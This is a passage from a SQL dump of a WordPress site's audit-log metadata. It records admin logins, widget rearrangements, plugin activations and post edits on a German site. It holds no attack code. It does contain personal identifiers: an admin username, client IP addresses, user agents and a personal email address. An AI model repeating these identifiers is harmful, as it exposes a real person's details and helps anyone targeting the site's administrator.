Safari/537.36'),(744,166,'Username','Olli'),(745,166,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(746,166,'ClientIP','5.147.41.205'),(747,166,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(748,167,'Username','Olli'),(749,167,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(750,167,'ClientIP','195.128.40.90'),(751,167,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(752,168,'WidgetName','twitter_timeline'),(753,168,'Sidebar','Secondary Widget Area'),(754,168,'ClientIP','195.128.40.90'),(755,168,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(756,168,'CurrentUserID','2'),(757,168,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(758,169,'WidgetName','search-2'),(759,169,'OldPosition','2'),(760,169,'NewPosition','1'),(761,169,'Sidebar','Main Widget Area'),(762,169,'ClientIP','195.128.40.90'),(763,169,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(764,169,'CurrentUserID','2'),(765,169,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(766,170,'WidgetName','recent-posts-2'),(767,170,'OldPosition','3'),(768,170,'NewPosition','2'),(769,170,'Sidebar','Main Widget Area'),(770,170,'ClientIP','195.128.40.90'),(771,170,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(772,170,'CurrentUserID','2'),(773,170,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(774,171,'WidgetName','recent-comments-2'),(775,171,'OldPosition','4'),(776,171,'NewPosition','3'),(777,171,'Sidebar','Main Widget Area'),(778,171,'ClientIP','195.128.40.90'),(779,171,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(780,171,'CurrentUserID','2'),(781,171,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(782,172,'WidgetName','archives-2'),(783,172,'OldPosition','5'),(784,172,'NewPosition','4'),(785,172,'Sidebar','Main Widget Area'),(786,172,'ClientIP','195.128.40.90'),(787,172,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(788,172,'CurrentUserID','2'),(789,172,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(790,173,'WidgetName','categories-2'),(791,173,'OldPosition','6'),(792,173,'NewPosition','5'),(793,173,'Sidebar','Main Widget Area'),(794,173,'ClientIP','195.128.40.90'),(795,173,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(796,173,'CurrentUserID','2'),(797,173,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(798,174,'WidgetName','advads_ad_widget-2'),(799,174,'OldPosition','7'),(800,174,'NewPosition','1'),(801,174,'Sidebar','Main Widget Area'),(802,174,'ClientIP','195.128.40.90'),(803,174,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(804,174,'CurrentUserID','2'),(805,174,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(806,175,'WidgetName','meta-2'),(807,175,'OldPosition','8'),(808,175,'NewPosition','6'),(809,175,'Sidebar','Main Widget Area'),(810,175,'ClientIP','195.128.40.90'),(811,175,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(812,175,'CurrentUserID','2'),(813,175,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(814,176,'WidgetName','tag_cloud-2'),(815,176,'OldPosition','9'),(816,176,'NewPosition','7'),(817,176,'Sidebar','Main Widget Area'),(818,176,'ClientIP','195.128.40.90'),(819,176,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(820,176,'CurrentUserID','2'),(821,176,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(822,177,'WidgetName','twitter_timeline'),(823,177,'Sidebar','Secondary Widget Area'),(824,177,'ClientIP','195.128.40.90'),(825,177,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(826,177,'CurrentUserID','2'),(827,177,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(828,178,'WidgetName','twitter_timeline'),(829,178,'Sidebar','Secondary Widget Area'),(830,178,'ClientIP','195.128.40.90'),(831,178,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(832,178,'CurrentUserID','2'),(833,178,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(834,179,'PostID','161'),(835,179,'PostType','nav_menu_item'),(836,179,'PostTitle','Home'),(837,179,'ClientIP','195.128.40.90'),(838,179,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(839,179,'CurrentUserID','2'),(840,179,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(841,180,'PostID','163'),(842,180,'PostType','nav_menu_item'),(843,180,'PostTitle',''),(844,180,'ClientIP','195.128.40.90'),(845,180,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(846,180,'CurrentUserID','2'),(847,180,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(848,181,'PostID','164'),(849,181,'PostType','nav_menu_item'),(850,181,'PostTitle',''),(851,181,'ClientIP','195.128.40.90'),(852,181,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(853,181,'CurrentUserID','2'),(854,181,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(855,182,'Username','Olli'),(856,182,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(857,182,'ClientIP','195.128.40.90'),(858,182,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(859,183,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:10:\"TablePress\";s:9:\"PluginURI\";s:23:\"https://tablepress.org/\";s:7:\"Version\";s:5:\"1.6.1\";s:6:\"Author\";s:14:\"Tobias Bäthge\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(860,183,'ClientIP','195.128.40.90'),(861,183,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(862,183,'CurrentUserID','2'),(863,183,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(864,184,'PluginFile','/var/www/wordpress/wp-content/plugins/tablepress/tablepress.php'),(865,184,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:10:\"TablePress\";s:9:\"PluginURI\";s:23:\"https://tablepress.org/\";s:7:\"Version\";s:5:\"1.6.1\";s:6:\"Author\";s:14:\"Tobias Bäthge\";s:7:\"Network\";s:5:\"False\";}'),(866,184,'ClientIP','195.128.40.90'),(867,184,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(868,184,'CurrentUserID','2'),(869,184,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(870,185,'PostID','363'),(871,185,'PostType','tablepress_table'),(872,185,'PostTitle','Testtable'),(873,185,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=363'),(874,185,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=364'),(875,185,'ClientIP','195.128.40.90'),(876,185,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(877,185,'CurrentUserID','2'),(878,185,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(879,186,'PostID','365'),(880,186,'PostType','post'),(881,186,'PostTitle',''),(882,186,'PostUrl','http://www.ollital.de/wordpress/?p=365'),(883,186,'ClientIP','195.128.40.90'),(884,186,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(885,186,'CurrentUserID','2'),(886,186,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(887,187,'PostID','365'),(888,187,'PostType','post'),(889,187,'PostTitle','Auto Draft'),(890,187,'OldDate','2015-11-23 12:01:48'),(891,187,'NewDate','2015-11-23 12:02:00'),(892,187,'ClientIP','195.128.40.90'),(893,187,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(894,187,'CurrentUserID','2'),(895,187,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(896,188,'Username','Olli'),(897,188,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(898,188,'ClientIP','195.128.40.90'),(899,188,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(900,189,'PostID','367'),(901,189,'PostType','tablepress_table'),(902,189,'PostTitle','Besetzung der Begleitkommission Jugend- und Kinderförderplan'),(903,189,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=367'),(904,189,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=368'),(905,189,'ClientIP','195.128.40.90'),(906,189,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(907,189,'CurrentUserID','2'),(908,189,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(909,190,'Username','Olli'),(910,190,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(911,190,'ClientIP','195.128.40.90'),(912,190,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(913,191,'Username','Olli'),(914,191,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(915,191,'ClientIP','195.128.40.90'),(916,191,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(917,192,'PostID','349'),(918,192,'PostType','post'),(919,192,'PostTitle','Besetzung der Begleitkommission Jugend- und Kinderförderplan'),(920,192,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/besetzung-der-begleitkommission-jugend-und-kinderforderplan/'),(921,192,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=370'),(922,192,'ClientIP','195.128.40.90'),(923,192,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(924,192,'CurrentUserID','2'),(925,192,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(926,193,'PostID','367'),(927,193,'PostType','tablepress_table'),(928,193,'PostTitle','Besetzung der Begleitkommission Jugend- und Kinderförderplan'),(929,193,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=367'),(930,193,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=368'),(931,193,'ClientIP','195.128.40.90'),(932,193,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(933,193,'CurrentUserID','2'),(934,193,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(935,194,'PostID','365'),(936,194,'PostType','post'),(937,194,'PostTitle',''),(938,194,'ClientIP','195.128.40.90'),(939,194,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(940,194,'CurrentUserID','2'),(941,194,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(942,195,'PostID','365'),(943,195,'PostType','post'),(944,195,'PostTitle',''),(945,195,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/365/'),(946,195,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=366'),(947,195,'ClientIP','195.128.40.90'),(948,195,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(949,195,'CurrentUserID','2'),(950,195,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(951,196,'PostID','365'),(952,196,'PostTitle',''),(953,196,'MetaKey','maa_disable_display'),(954,196,'MetaValue','0'),(955,196,'MetaLink','maa_disable_display'),(956,196,'ClientIP','195.128.40.90'),(957,196,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(958,196,'CurrentUserID','2'),(959,196,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(960,197,'PostID','365'),(961,197,'PostTitle',''),(962,197,'MetaKey','maa_disable_auto_insert'),(963,197,'MetaValue','0'),(964,197,'MetaLink','maa_disable_auto_insert'),(965,197,'ClientIP','195.128.40.90'),(966,197,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(967,197,'CurrentUserID','2'),(968,197,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(969,198,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(970,198,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.5\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(971,198,'ClientIP','195.128.40.90'),(972,198,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(973,198,'CurrentUserID','2'),(974,198,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(975,199,'Username','Olli'),(976,199,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(977,199,'ClientIP','195.128.40.90'),(978,199,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(979,200,'Username','Olli'),(980,200,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(981,200,'ClientIP','195.128.40.90'),(982,200,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(983,201,'PostID','367'),(984,201,'PostType','tablepress_table'),(985,201,'PostTitle','Besetzung der Begleitkommission Jugend- und Kinderförderplan'),(986,201,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=367'),(987,201,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=368'),(988,201,'ClientIP','195.128.40.90'),(989,201,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(990,201,'CurrentUserID','2'),(991,201,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(992,202,'WidgetName','tag_cloud'),(993,202,'Sidebar',''),(994,202,'ClientIP','195.128.40.90'),(995,202,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(996,202,'CurrentUserID','2'),(997,202,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(998,203,'Username','Olli'),(999,203,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1000,203,'ClientIP','194.99.144.7'),(1001,203,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(1002,204,'Username','Olli'),(1003,204,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1004,204,'ClientIP','5.147.41.205'),(1005,204,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1006,205,'Username','Olli'),(1007,205,'CurrentUserRoles','a:3:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";i:2;s:10:\"superadmin\";}'),(1008,205,'ClientIP','5.147.41.205'),(1009,205,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1010,206,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(1011,206,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.5\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(1012,206,'ClientIP','195.128.40.90'),(1013,206,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1014,206,'CurrentUserID','2'),(1015,206,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1016,207,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:24:\"Akismet Privacy Policies\";s:9:\"PluginURI\";s:16:\"http://wpde.org/\";s:7:\"Version\";s:5:\"1.1.2\";s:6:\"Author\";s:12:\"Inpsyde GmbH\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(1017,207,'ClientIP','195.128.40.90'),(1018,207,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1019,207,'CurrentUserID','2'),(1020,207,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1021,208,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet-privacy-policies/akismet-privacy-policies.php'),(1022,208,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Akismet Privacy Policies\";s:9:\"PluginURI\";s:16:\"http://wpde.org/\";s:7:\"Version\";s:5:\"1.1.2\";s:6:\"Author\";s:12:\"Inpsyde GmbH\";s:7:\"Network\";s:5:\"False\";}'),(1023,208,'ClientIP','195.128.40.90'),(1024,208,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1025,208,'CurrentUserID','2'),(1026,208,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1027,209,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(1028,209,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.5\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(1029,209,'ClientIP','195.128.40.90'),(1030,209,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1031,209,'CurrentUserID','2'),(1032,209,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1033,210,'NewUserID','4'),(1034,210,'NewUserData','O:8:\"stdClass\":5:{s:8:\"Username\";s:6:\"Tester\";s:9:\"FirstName\";s:16:\"olli-graf@t9s.de\";s:8:\"LastName\";s:7:\"Simpson\";s:5:\"Email\";s:16:\"olli-graf@t9s.de\";s:5:\"Roles\";s:10:\"subscriber\";}'),(1035,210,'ClientIP','195.128.40.90'),(1036,210,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1037,210,'CurrentUserID','2'),(1038,210,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1039,211,'Username','Tester'),(1040,211,'CurrentUserRoles','a:1:{i:0;s:10:\"subscriber\";}'),(1041,211,'ClientIP','195.128.40.90'),(1042,211,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(1043,212,'Plugin','O:8:\"stdClass\":6:{s:4:\"Name\";s:12:\"Antispam Bee\";s:9:\"PluginURI\";s:43:\"https://wordpress.org/plugins/antispam-bee/\";s:7:\"Version\";s:5:\"2.6.8\";s:6:\"Author\";s:15:\"pluginkollektiv\";s:7:\"Network\";s:5:\"False\";s:15:\"plugin_dir_path\";s:38:\"/var/www/wordpress/wp-content/plugins/\";}'),(1044,212,'ClientIP','195.128.40.90'),(1045,212,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1046,212,'CurrentUserID','2'),(1047,212,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1048,213,'PluginFile','/var/www/wordpress/wp-content/plugins/antispam-bee/antispam_bee.php'),(1049,213,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Antispam Bee\";s:9:\"PluginURI\";s:43:\"https://wordpress.org/plugins/antispam-bee/\";s:7:\"Version\";s:5:\"2.6.8\";s:6:\"Author\";s:15:\"pluginkollektiv\";s:7:\"Network\";s:5:\"False\";}'),(1050,213,'ClientIP','195.128.40.90'),(1051,213,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1052,213,'CurrentUserID','2'),(1053,213,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1054,214,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(1055,214,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:7:\"Akismet\";s:9:\"PluginURI\";s:19:\"http://akismet.com/\";s:7:\"Version\";s:5:\"3.1.5\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(1056,214,'ClientIP','195.128.40.90'),(1057,214,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1058,214,'CurrentUserID','2'),(1059,214,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1060,215,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet-privacy-policies/akismet-privacy-policies.php'),(1061,215,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Akismet Privacy Policies\";s:9:\"PluginURI\";s:16:\"http://wpde.org/\";s:7:\"Version\";s:5:\"1.1.2\";s:6:\"Author\";s:12:\"Inpsyde GmbH\";s:7:\"Network\";s:5:\"False\";}'),(1062,215,'ClientIP','195.128.40.90'),(1063,215,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1064,215,'CurrentUserID','2'),(1065,215,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1066,216,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet-privacy-policies/akismet-privacy-policies.php'),(1067,216,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:24:\"Akismet Privacy Policies\";}'),(1068,216,'ClientIP','195.128.40.90'),(1069,216,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1070,216,'CurrentUserID','2'),(1071,216,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1072,217,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet-privacy-policies/akismet-privacy-policies.php'),(1073,217,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:24:\"Akismet Privacy Policies\";}'),(1074,217,'ClientIP','195.128.40.90'),(1075,217,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1076,217,'CurrentUserID','2'),(1077,217,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1078,218,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(1079,218,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:7:\"Akismet\";}'),(1080,218,'ClientIP','195.128.40.90'),(1081,218,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1082,218,'CurrentUserID','2'),(1083,218,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1084,219,'PluginFile','/var/www/wordpress/wp-content/plugins/akismet/akismet.php'),(1085,219,'PluginData','O:8:\"stdClass\":1:{s:4:\"Name\";s:7:\"Akismet\";}'),(1086,219,'ClientIP','195.128.40.90'),(1087,219,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(1088,219,'CurrentUserID','2'),(1089,219,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1090,220,'Username','Olli'),(1091,220,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1092,220,'ClientIP','109.44.0.89'),(1093,220,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36'),(1094,221,'PostID','357'),(1095,221,'PostType','post'),(1096,221,'PostTitle','Auto 